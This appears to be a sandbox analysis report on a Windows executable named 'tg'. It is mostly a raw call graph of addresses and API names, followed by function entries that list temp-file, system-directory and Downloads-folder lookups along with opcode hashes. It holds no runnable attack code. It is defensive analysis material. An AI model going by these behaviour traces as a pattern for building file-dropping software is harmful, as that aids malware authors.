GetSystemMetrics CreateWindowExW 9244->9245 9246 4092ba 9245->9246 9247 4090cb SetWindowLongW CreateWindowExW SendMessageW 9245->9247 9248 4092cd 9246->9248 9325 40e340 TlsGetValue 9246->9325 9249 409125 9247->9249 9250 409128 CreateWindowExW SendMessageW SetFocus 9247->9250 9326 408e9a 9248->9326 9249->9250 9253 4091a5 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 9250->9253 9254 40917b SendMessageW wcslen wcslen SendMessageW 9250->9254 9256 40926a 9253->9256 9254->9253 9258 409273 9256->9258 9259 40922e GetMessageW 9256->9259 9257 408e9a HeapFree 9260 4092df 9257->9260 9262 409277 DestroyAcceleratorTable 9258->9262 9263 40927e 9258->9263 9259->9258 9261 409243 TranslateAcceleratorW 9259->9261 9264 408e9a HeapFree 9260->9264 9261->9256 9265 409254 TranslateMessage DispatchMessageW 9261->9265 9262->9263 9263->9246 9266 409285 wcslen 9263->9266 9267 4092e5 9264->9267 9265->9256 9268 40e260 3 API calls 9266->9268 9267->8400 9269 40929c wcscpy HeapFree 9268->9269 9269->9246 9270->8407 9271->8409 9272->8411 9273->8413 9274->8417 9275->8423 9276->8425 9277->8427 9278->8431 9279->8433 9281 4094d1 3 API calls 9280->9281 9282 408e2d 9281->9282 9283 409588 16 API calls 9282->9283 9284 408e36 MessageBoxW 9283->9284 9285 409588 16 API calls 9284->9285 9286 40239f 9285->9286 9286->8436 9287->8334 9288->8341 9290 409bcd 9289->9290 9291 40e260 3 API calls 9290->9291 9292 409beb 9291->9292 9293 409bf1 memcpy 9292->9293 9294 409bff 9292->9294 9293->9294 9294->9190 9295->9193 9299 405fa1 9296->9299 9297 40e1e0 TlsGetValue 9298 406014 9297->9298 9300 40e260 3 API calls 9298->9300 9299->9297 9299->9299 9301 406022 9300->9301 9303 406032 9301->9303 9304 40e370 TlsGetValue 9301->9304 9303->9197 9304->9303 9305->9219 9306->9210 9308 408e60 wcslen HeapAlloc 9307->9308 9309 408e96 9307->9309 9308->9309 9310 408e86 wcscpy 9308->9310 9309->9230 9310->9230 9312 409032 9311->9312 9313 4094e2 GetWindowThreadProcessId GetCurrentProcessId 9311->9313 9314 409588 9312->9314 9313->9312 9315 409592 EnumWindows 9314->9315 9320 4095dd 9314->9320 9316 40903e 9315->9316 9317 4095af 9315->9317 9329 409507 GetWindowThreadProcessId GetCurrentThreadId 9315->9329 9316->9241 9316->9242 9317->9316 9319 4095b1 GetCurrentThreadId 9317->9319 9322 4095c4 SetWindowPos 9317->9322 9318 4095ea GetCurrentThreadId 9318->9320 9319->9317 9320->9316 9320->9318 9321 409600 EnableWindow 9320->9321 9323 409611 SetWindowPos 9320->9323 9324 40db32 HeapFree 9320->9324 9321->9320 9322->9317 9323->9320 9324->9320 9325->9248 9327 408ea1 HeapFree 9326->9327 9328 408eb3 9326->9328 9327->9328 9328->9257 9330 409525 IsWindowVisible 9329->9330 9331 40957f 9329->9331 9330->9331 9332 409530 9330->9332 9333 40db72 HeapAlloc 9332->9333 9334 40953c GetCurrentThreadId GetWindowLongW 9333->9334 9335 40955a 9334->9335 9336 40955e GetForegroundWindow 9334->9336 9335->9336 9336->9331 9337 409568 IsWindowEnabled 9336->9337 9337->9331 9338 409573 EnableWindow 9337->9338 9338->9331 9339->8447 9340->8450 9342 40e260 3 API calls 9341->9342 9343 40a769 GetTempPathW LoadLibraryW 9342->9343 9344 40a7a4 9343->9344 9345 40a786 GetProcAddress 9343->9345 9367 40e3f0 TlsGetValue 9344->9367 9346 40a796 GetLongPathNameW 9345->9346 9347 40a79d FreeLibrary 9345->9347 9346->9347 9347->9344 9349 401a0d 9349->8453 9350->8456 9351->8459 9368 40a7b9 9352->9368 9355 40a6c5 9356 40a6d4 wcsncpy wcslen 9355->9356 9357 401a6a GetTempFileNameW 9355->9357 9359 40a708 CreateDirectoryW 9356->9359 9360 40de80 GetLastError TlsGetValue SetLastError 9357->9360 9359->9357 9360->8470 9361->8472 9362->8482 9363->8484 9364->8492 9365->8494 9366->8500 9367->9349 9369 40a7c0 9368->9369 9370 401a5f 9368->9370 9371 40a7d6 DeleteFileW 9369->9371 9372 40a7c7 SetFileAttributesW 9369->9372 9370->9355 9371->9370 9372->9371 9373->8512 9375 40a961 SetCurrentDirectoryW 9374->9375 9376 4046cb 9374->9376 9375->9376 9376->8521 9377->8603 9378->8638 9379->8545 9380->8552 9381->8546 9382->8551 9383->8564 9385 40e260 3 API calls 9384->9385 9386 40a84f 9385->9386 9387 40a85e LoadLibraryW 9386->9387 9393 40a8e9 9386->9393 9388 40a8cb 9387->9388 9389 40a86f GetProcAddress 9387->9389 9391 40a96c 4 API calls 9388->9391 9390 40a8c0 FreeLibrary 9389->9390 9397 40a884 9389->9397 9390->9388 9398 40a91b 9390->9398 9396 40a8d3 wcscat wcslen 9391->9396 9393->9398 9444 40a96c SHGetFolderLocation 9393->9444 9395 40362c 9395->8593 9396->9398 9397->9390 9399 40a896 wcscpy wcscat wcslen CoTaskMemFree 9397->9399 9450 40e3f0 TlsGetValue 9398->9450 9399->9390 9400->8561 9401->8579 9402->8566 9403->8583 9404->8580 9405->8589 9406->8584 9407->8604 9408->8590 9409->8611 9410->8605 9411->8625 9412->8612 9413->8629 9414->8618 9415->8634 9417 409368 CoInitialize 9416->9417 9418 409379 memset LoadLibraryW 9416->9418 9417->9418 9419 4093a3 GetProcAddress GetProcAddress 9418->9419 9420 4094ab 9418->9420 9421 4093d2 wcsncpy wcslen 9419->9421 9422 4093cd 9419->9422 9423 40e260 3 API calls 9420->9423 9424 409401 9421->9424 9422->9421 9425 4094b8 9423->9425 9426 4094d1 3 API calls 9424->9426 9451 40e3f0 TlsGetValue 9425->9451 9427 40941f 9426->9427 9430 409588 16 API calls 9427->9430 9429 4037c6 9429->8648 9431 409442 9430->9431 9432 409588 16 API calls 9431->9432 9433 409457 9432->9433 9434 40949f FreeLibrary 9433->9434 9435 40e260 3 API calls 9433->9435 9434->9420 9434->9425 9436 409468 CoTaskMemFree wcslen 9435->9436 9436->9434 9438 409493 9436->9438 9438->9434 9440 40553b timeBeginPeriod 9439->9440 9441 40554d Sleep 9439->9441 9440->9441 9442->8619 9443->8635 9445 40a98b SHGetPathFromIDListW 9444->9445 9446 40a9be 9444->9446 9447 40a9b5 CoTaskMemFree 9445->9447 9448 40a999 wcslen 9445->9448 9446->9398 9447->9446 9448->9447 9449 40a9a6 9448->9449 9449->9447 9450->9395 9451->9429 9452->8670 9453->8672 9454->8678 9455->8680 9456->8684 9457->8703 9458->8705 9459->8714 9461 4024f7 9460->9461 9461->9461 9462 40dfc0 21 API calls 9461->9462 9463 402509 9462->9463 9464 4051a0 3 API calls 9463->9464 9483 402512 9464->9483 9465 402593 9528 40de80 GetLastError TlsGetValue SetLastError 9465->9528 9467 402599 9529 40de80 GetLastError TlsGetValue SetLastError 9467->9529 9469 4025a1 GetCommandLineW 9471 409bc0 4 API calls 9469->9471 9470 405dc0 3 API calls 9470->9483 9472 4025ae 9471->9472 9474 40dec0 3 API calls 9472->9474 9473 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9473->9483 9475 4025b8 9474->9475 9530 40de80 GetLastError TlsGetValue SetLastError 9475->9530 9476 40de80 GetLastError TlsGetValue SetLastError 9476->9483 9478 4025c2 9479 40e020 4 API calls 9478->9479 9481 4025ca 9479->9481 9480 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 9480->9483 9482 40dec0 3 API calls 9481->9482 9484 4025d4 PathRemoveArgsW 9482->9484 9483->9465 9483->9470 9483->9473 9483->9476 9483->9480 9485 4025eb 9484->9485 9486 402651 9485->9486 9531 40de80 GetLastError TlsGetValue SetLastError 9485->9531 9488 4098c0 SetEnvironmentVariableW 9486->9488 9490 40265e 9488->9490 9489 4025fd 9491 40e020 4 API calls 9489->9491 9544 40de80 GetLastError TlsGetValue SetLastError 9490->9544 9493 40260a 9491->9493 9532 40de80 GetLastError TlsGetValue SetLastError 9493->9532 9494 402668 9496 40e020 4 API calls 9494->9496 9497 402670 9496->9497 9545 405170 TlsGetValue 9497->9545 9498 402610 9533 40de80 GetLastError TlsGetValue SetLastError 9498->9533 9501 402677 9505 40df50 HeapFree 9501->9505 9502 402618 9534 40de80 GetLastError TlsGetValue SetLastError 9502->9534 9504 402620 9535 40de80 GetLastError TlsGetValue SetLastError 9504->9535 9507 40268f 9505->9507 9509 40df50 HeapFree 9507->9509 9508 402628 9536 406110 9508->9536 9511 402698 9509->9511 9513 40df50 HeapFree 9511->9513 9512 402639 9543 405182 TlsGetValue 9512->9543 9515 4026a1 9513->9515 9517 40df50 HeapFree 9515->9517 9516 40263e 9518 406060 5 API calls 9516->9518 9519 4026aa 9517->9519 9520 402646 9518->9520 9521 40df50 HeapFree 9519->9521 9522 40dec0 3 API calls 9520->9522 9523 401ea4 9521->9523 9522->9486 9523->8720 9524->8726 9525->8715 9526->8727 9527->8735 9528->9467 9529->9469 9530->9478 9531->9489 9532->9498 9533->9502 9534->9504 9535->9508 9537 406146 9536->9537 9538 406118 9536->9538 9555 40e340 TlsGetValue 9537->9555 9546 406080 9538->9546 9540 40614f 9540->9512 9543->9516 9544->9494 9545->9501 9547 40e1e0 TlsGetValue 9546->9547 9548 40609c 9547->9548 9549 40e260 3 API calls 9548->9549 9550 4060a8 9549->9550 9552 4060b4 9550->9552 9556 40e370 TlsGetValue 9550->9556 9557 40e3f0 TlsGetValue 9552->9557 9554 4060fd 9554->9512 9555->9540 9556->9552 9557->9554 9558->8748 9559->8750 9560->8753 9561->8755 9562->8761 9563->8769 9564->8771 9565->8773 9566->8775 9567->8779 9568->8785 9569->8787 9570->8789 9571->8791 9572->8795 9573->8801 9574->8803 9575->8805 9576->8807 9577->8811 9578->8817 9579->8819 9580->8821 9581->8823 9582->8827 9583->8833 9585 40dfc0 21 API calls 9584->9585 9586 403ce3 9585->9586 9587 4051a0 3 API calls 9586->9587 9588 403cec 9587->9588 9589 405060 2 API calls 9588->9589 9590 403cf8 FindResourceW 9589->9590 9591 403db3 9590->9591 9592 403d1b 9590->9592 9714 40de80 GetLastError TlsGetValue SetLastError 9591->9714 9593 4026b8 26 API calls 9592->9593 9595 403d2a 9593->9595 9597 4046ef HeapSize 9595->9597 9596 403dbd 9598 40e020 4 API calls 9596->9598 9599 403d37 9597->9599 9600 403dc5 9598->9600 9661 4011de 9599->9661 9715 405170 TlsGetValue 9600->9715 9604 403dcc 9607 40df50 HeapFree 9604->9607 9605 403d5a 9685 4046ff 9605->9685 9606 403d7c 9701 40de80 GetLastError TlsGetValue SetLastError 9606->9701 9610 403de3 9607->9610 9614 40df50 HeapFree 9610->9614 9612 403d82 9702 40de80 GetLastError TlsGetValue SetLastError 9612->9702 9617 403a61 9614->9617 9616 403d8a 9703 409cb0 9616->9703 9617->8836 9618 403d7a 9716 40e0b0 TlsGetValue 9618->9716 9620 403da0 9622 40dec0 3 API calls 9620->9622 9623 403daa 9622->9623 9713 409b80 HeapFree 9623->9713 9625->8839 9626->8845 9627->8851 9628->8857 9629->8863 9630->8865 9631->8867 9632->8871 9633->8873 9793 406310 9634->9793 9636 403b28 9636->8876 9637->8879 9638->8881 9639->8883 9640->8887 9641->8889 9642->8895 9643->8897 9644->8909 9645->8911 9647 405060 2 API calls 9646->9647 9648 40241f 9647->9648 9649 405060 2 API calls 9648->9649 9650 40242c 9649->9650 9823 40acb0 9650->9823 9654 402457 9656 40a9d0 11 API calls 9654->9656 9655 402464 9657 40df50 HeapFree 9655->9657 9656->9655 9658 40248b 9657->9658 9659 40df50 HeapFree 9658->9659 9660 402494 9659->9660 9660->8914 9662 4011e6 9661->9662 9662->9662 9663 405060 2 API calls 9662->9663 9664 4011ff 9663->9664 9717 405700 9664->9717 9667 409b60 HeapSize 9668 401214 9667->9668 9669 40dbca 4 API calls 9668->9669 9670 401236 9669->9670 9671 40dbca 4 API calls 9670->9671 9672 401254 9671->9672 9673 40dbca 4 API calls 9672->9673 9674 4014ac 9673->9674 9675 40dbca 4 API calls 9674->9675 9676 4014ca 9675->9676 9724 409b80 HeapFree 9676->9724 9678 4014d3 9679 40df50 HeapFree 9678->9679 9680 4014e3 9679->9680 9681 40dd1d 2 API calls 9680->9681 9682 4014ed 9681->9682 9683 40dd1d 2 API calls 9682->9683 9684 4014f6 9683->9684 9684->9605 9684->9606 9686 40dfc0 21 API calls 9685->9686 9687 40470d 9686->9687 9688 405060 2 API calls 9687->9688 9689 404719 9688->9689 9690 40472c 9689->9690 9725 40249b 9689->9725 9699 40473d 9690->9699 9734 40acd0 9690->9734 9693 40df50 HeapFree 9694 403d71 9693->9694 9700 409b80 HeapFree 9694->9700 9695 40474f 9696 40478f 9695->9696 9695->9699 9745 40afb0 9695->9745 9698 40a9d0 11 API calls 9696->9698 9698->9699 9699->9693 9700->9618 9701->9612 9702->9616 9704 409cd0 9703->9704 9708 409d28 9703->9708 9705 40e260 3 API calls 9704->9705 9706 409cf9 9705->9706 9792 40e3f0 TlsGetValue 9706->9792 9707 409d83 MultiByteToWideChar 9710 40e260 3 API calls 9707->9710 9708->9707 9712 409da0 MultiByteToWideChar 9710->9712 9711 409d1d 9711->9620 9712->9620 9713->9591 9714->9596 9715->9604 9716->9604 9718 405710 WideCharToMultiByte 9717->9718 9719 40570b 9717->9719 9720 409ba0 RtlAllocateHeap 9718->9720 9719->9718 9721 405730 9720->9721 9722 405736 WideCharToMultiByte 9721->9722 9723 401207 9721->9723 9722->9723 9723->9667 9724->9678 9726 405060 2 API calls 9725->9726 9727 4024ac 9726->9727 9756 40ada0 9727->9756 9730 4024d3 9732 40df50 HeapFree 9730->9732 9731 40a9d0 11 API calls 9731->9730 9733 4024eb 9732->9733 9733->9690 9735 40d498 5 API calls 9734->9735 9736 40ace5 9735->9736 9737 40ad97 9736->9737 9738 40acef CreateFileW 9736->9738 9737->9695 9739 40ad10 CreateFileW 9738->9739 9740 40ad2c 9738->9740 9739->9740 9742 40ad4d 9739->9742 9741 40ad39 HeapAlloc 9740->9741 9740->9742 9741->9742 9743 40d40a 4 API calls 9742->9743 9744 40ad8e 9742->9744 9743->9744 9744->9695 9746 40afc2 9745->9746 9747 40b015 9745->9747 9748 40b00d 9746->9748 9749 40d459 2 API calls 9746->9749 9747->9696 9748->9696 9750 40afda 9749->9750 9751 40b003 9750->9751 9752 40aff2 WriteFile 9750->9752 9753 40afe4 9750->9753 9751->9696 9752->9751 9781 40b020 9753->9781 9755 40afec 9755->9696 9759 40aac0 9756->9759 9758 4024bf 9758->9730 9758->9731 9760 40aad8 9759->9760 9761 40d498 5 API calls 9760->9761 9762 40aaef 9761->9762 9763 40aca2 9762->9763 9764 40ab02 9762->9764 9765 40ab3e 9762->9765 9763->9758 9767 40ab19 9764->9767 9768 40ab1c CreateFileW 9764->9768 9766 40ab43 9765->9766 9771 40ab7c 9765->9771 9769 40ab5a 9766->9769 9770 40ab5d CreateFileW 9766->9770 9767->9768 9775 40abe8 9768->9775 9769->9770 9770->9775 9772 40aba7 CreateFileW 9771->9772 9771->9775 9774 40abc9 CreateFileW 9772->9774 9772->9775 9773 40ac70 9776 40d40a 4 API calls 9773->9776 9780 40ac81 9773->9780 9774->9775 9775->9773 9777 40ac0e HeapAlloc 9775->9777 9778 40ac22 9775->9778 9776->9763 9777->9778 9778->9773 9779 40ac5c SetFilePointer 9778->9779 9779->9773 9780->9758 9782 40b127 9781->9782 9783 40b03a 9781->9783 9782->9755 9784 40b040 SetFilePointer 9783->9784 9785 40b06b 9783->9785 9784->9785 9787 40aa40 WriteFile 9785->9787 9789 40b077 9785->9789 9786 40b0a7 9786->9755 9788 40b0ee 9787->9788 9788->9789 9790 40b0f5 WriteFile 9788->9790 9789->9786 9791 40b091 memcpy 9789->9791 9790->9755 9791->9755 9792->9711 9794 40631f 9793->9794 9795 406438 9794->9795 9806 4063ae 9794->9806 9796 40e1e0 TlsGetValue 9795->9796 9798 406442 9796->9798 9797 40660a 9797->9636 9799 40645a 9798->9799 9800 40644a _wcsdup 9798->9800 9801 40e1e0 TlsGetValue 9799->9801 9800->9799 9802 406460 9801->9802 9803 406477 9802->9803 9804 406468 _wcsdup 9802->9804 9805 40e1e0 TlsGetValue 9803->9805 9804->9803 9807 406480 9805->9807 9806->9797 9808 4063fc wcsncpy 9806->9808 9810 40642e 9806->9810 9809 406488 _wcsdup 9807->9809 9813 406498 9807->9813 9808->9806 9809->9813 9810->9636 9811 40e260 3 API calls 9812 406520 9811->9812 9814 406572 wcsncpy 9812->9814 9815 406526 9812->9815 9818 40658d 9812->9818 9813->9811 9814->9818 9816 4065e4 9815->9816 9817 4065db free 9815->9817 9819 4065f7 9816->9819 9820 4065eb free 9816->9820 9817->9816 9818->9815 9822 406625 wcsncpy 9818->9822 9819->9797 9821 4065fe free 9819->9821 9820->9819 9821->9797 9822->9818 9824 40aac0 15 API calls 9823->9824 9825 40243f 9824->9825 9825->9655 9826 40af80 9825->9826 9827 40d459 2 API calls 9826->9827 9828 40af8f 9827->9828 9829 40afa3 9828->9829 9832 40ae80 9828->9832 9829->9654 9831 40afa0 9831->9654 9833 40af74 9832->9833 9834 40ae94 9832->9834 9833->9831 9834->9833 9835 40aea8 9834->9835 9836 40af0d 9834->9836 9837 40aee0 9835->9837 9838 40aeb8 9835->9838 9850 40b130 WideCharToMultiByte 9836->9850 9837->9837 9840 40aeeb WriteFile 9837->9840 9843 40b020 4 API calls 9838->9843 9840->9831 9841 40af27 9842 40af6b 9841->9842 9844 40af37 9841->9844 9845 40af48 WriteFile 9841->9845 9842->9831 9846 40aeda 9843->9846 9847 40b020 4 API calls 9844->9847 9848 40af5c HeapFree 9845->9848 9846->9831 9849 40af42 9847->9849 9848->9842 9849->9848 9851 40b155 HeapAlloc 9850->9851 9852 40b18e 9850->9852 9853 40b189 9851->9853 9854 40b16c WideCharToMultiByte 9851->9854 9852->9841 9853->9841 9854->9853 10158 409def HeapAlloc 10157->10158 10159 409ed8 10157->10159 10158->7827 10158->7828 10184 40a11a 10159->10184 10161 409ee0 10162 40d946 9 API calls 10161->10162 10163 409ee8 HeapFree HeapFree 10162->10163 10164 409f23 HeapFree 10163->10164 10165 409f0f 10163->10165 10164->10158 10166 409f10 HeapFree 10165->10166 10166->10166 10167 409f22 10166->10167 10167->10164 10169 40d83a 10168->10169 10170 40d8f2 RtlAllocateHeap 10169->10170 10171 40d846 10169->10171 10173 40d907 10170->10173 10174 409e76 HeapAlloc 10170->10174 10191 40da43 LoadLibraryW 10171->10191 10173->10174 10176 40d930 InitializeCriticalSection 10173->10176 10174->7827 10176->10174 10177 40d86b 10179 40d887 HeapAlloc 10177->10179 10180 40d8e5 LeaveCriticalSection 10177->10180 10179->10180 10181 40d89d 10179->10181 10180->10174 10182 40d819 6 API calls 10181->10182 10183 40d8b4 10182->10183 10183->10180 10187 40a12e 10184->10187 10185 40a177 memset 10188 40a190 10185->10188 10186 40a139 HeapFree 10186->10187 10187->10185 10187->10186 10189 411d8a HeapFree 10187->10189 10190 40d74b 3 API calls 10187->10190 10188->10161 10189->10187 10190->10187 10192 40da60 GetProcAddress 10191->10192 10193 40da8b InterlockedCompareExchange 10191->10193 10196 40da80 FreeLibrary 10192->10196 10197 40da70 10192->10197 10194 40da9b 10193->10194 10195 40daaf InterlockedExchange 10193->10195 10198 40d855 EnterCriticalSection 10194->10198 10200 40daa0 Sleep 10194->10200 10195->10198 10196->10193 10196->10198 10197->10196 10198->10177 10200->10194 10201->7843 10202->7845 10203->7847 10204->7849 10205->7853 10206->7859 10207->7861 10208->7863 10209->7865 10210->7869 10211->7877 10212->7883 10213->7885 10214->7892 10215->7894 10216->7896 10217->7898 10218->7902 10219->7908 10220->7910 10221->7912 10222->7914 10223->7918 10224->7924 10225->7930 10226->7936 10227->7938 10228->7944 10229->7950 10474 406289 10475 406290 10474->10475 10475->10475 10478 40e3f0 TlsGetValue 10475->10478 10477 4062b5 10478->10477 10250 40b020 10251 40b127 10250->10251 10252 40b03a 10250->10252 10253 40b040 SetFilePointer 10252->10253 10254 40b06b 10252->10254 10253->10254 10256 40aa40 WriteFile 10254->10256 10258 40b077 10254->10258 10255 40b0a7 10257 40b0ee 10256->10257 10257->10258 10259 40b0f5 WriteFile 10257->10259 10258->10255 10260 40b091 memcpy 10258->10260 10637 401f3b 10638 40dfc0 21 API calls 10637->10638 10639 401f43 10638->10639 10660 40de80 GetLastError TlsGetValue SetLastError 10639->10660 10641 401f49 10661 40de80 GetLastError TlsGetValue SetLastError 10641->10661 10643 401f5a 10644 40e020 4 API calls 10643->10644 10645 401f62 10644->10645 10662 40de80 GetLastError TlsGetValue SetLastError 10645->10662 10647 401f68 10663 40de80 GetLastError TlsGetValue SetLastError 10647->10663 10649 401f70 10664 409b10 10649->10664 10653 401f7d 10668 405182 TlsGetValue 10653->10668 10655 401f88 10656 408e27 20 API calls 10655->10656 10657 401f91 10656->10657 10658 4051a0 3 API calls 10657->10658 10659 401f96 10658->10659 10659->10659 10660->10641 10661->10643 10662->10647 10663->10649 10669 409aa0 10664->10669 10667 40e080 TlsGetValue 10667->10653 10668->10655 10670 409ab0 10669->10670 10670->10670 10671 40e260 3 API calls 10670->10671 10672 401f77 10671->10672 10672->10667

                                      Executed Functions

                                      Function 0040A83A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 91libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 40a83a-40a858 call 40e260 3 40a8e9-40a8ec 0->3 4 40a85e-40a86d LoadLibraryW 0->4 7 40a91d-40a92f call 40e3f0 3->7 8 40a8ee 3->8 5 40a8cb-40a8e7 call 40a96c wcscat wcslen 4->5 6 40a86f-40a882 GetProcAddress 4->6 27 40a91b 5->27 9 40a8c0-40a8c9 FreeLibrary 6->9 10 40a884-40a894 6->10 8->7 13 40a901-40a903 8->13 14 40a911 8->14 15 40a914-40a916 call 40a96c 8->15 16 40a8f5-40a8f7 8->16 17 40a905-40a907 8->17 18 40a8f9-40a8fb 8->18 19 40a909-40a90b 8->19 20 40a8fd-40a8ff 8->20 21 40a90d-40a90f 8->21 9->5 9->7 10->9 28 40a896-40a8ba wcscpy wcscat wcslen CoTaskMemFree 10->28 22 40a913 13->22 14->22 15->27 16->22 17->22 18->22 19->22 20->22 21->22 22->15 27->7 28->9
                                      APIs
                                        • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                                        • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(008C0000,00000000,?,?), ref: 0040E2C7
                                      • LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040A863
                                      • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040A875
                                      • wcscpy.MSVCRT ref: 0040A89B
                                      • wcscat.MSVCRT ref: 0040A8A6
                                      • wcslen.MSVCRT ref: 0040A8AC
                                      • CoTaskMemFree.OLE32(?,00000000,00000000,?,008C8F58,00000000,00000000), ref: 0040A8BA
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,004046B8,00000000), ref: 0040A8C1
                                      • wcscat.MSVCRT ref: 0040A8D9
                                      • wcslen.MSVCRT ref: 0040A8DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
                                      • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                      • API String ID: 1740785346-287042676
                                      • Opcode ID: ace73f6e0916171b361586c2bbf184c955ba55397e49a90223a244ca9597bb20
                                      • Instruction ID: ae609db33c227b916d8c96984f24cc4820d8d1ee700964f601e6ad2a5a3ba7d8
                                      • Opcode Fuzzy Hash: ace73f6e0916171b361586c2bbf184c955ba55397e49a90223a244ca9597bb20
                                      • Instruction Fuzzy Hash: C821F871344701B6D2303B62EC4EF6F2A78DB91B90F11483BF901B51D2D6BC8A6199AF
                                      Function 0040195B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 168COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                      • GetTempFileNameW.KERNEL32(?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004043B9), ref: 00401A2A
                                      • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A7F
                                      • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AD4
                                      • PathAddBackslashW.SHLWAPI(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401ADF
                                      • PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000), ref: 00401B1E
                                      • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024), ref: 00401B38
                                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                        • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(008C0000,00000000,?,?), ref: 0040DF1C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
                                      • String ID: $pA$$pA$$pA$$pA
                                      • API String ID: 368575804-1531182785
                                      • Opcode ID: a7855c2fcb8ff53b5addb0dc43bc834e5fe5e71e8a4854cba452ae3e114c04c7
                                      • Instruction ID: 28b0c429ac0839269b991b7b7970ea1d3eb295239ca2258b2b80e935eceb64c8
                                      • Opcode Fuzzy Hash: a7855c2fcb8ff53b5addb0dc43bc834e5fe5e71e8a4854cba452ae3e114c04c7
                                      • Instruction Fuzzy Hash: CD510AB1514600AED600BBB1EC4297F7B7EEB98319F01883FF544690A2CA3D985D9A6D
                                      Function 00403275 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403302
                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040330B
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 0040342B
                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00403434
                                        • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(008C0000,00000000,?,?), ref: 0040DF1C
                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040333B
                                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
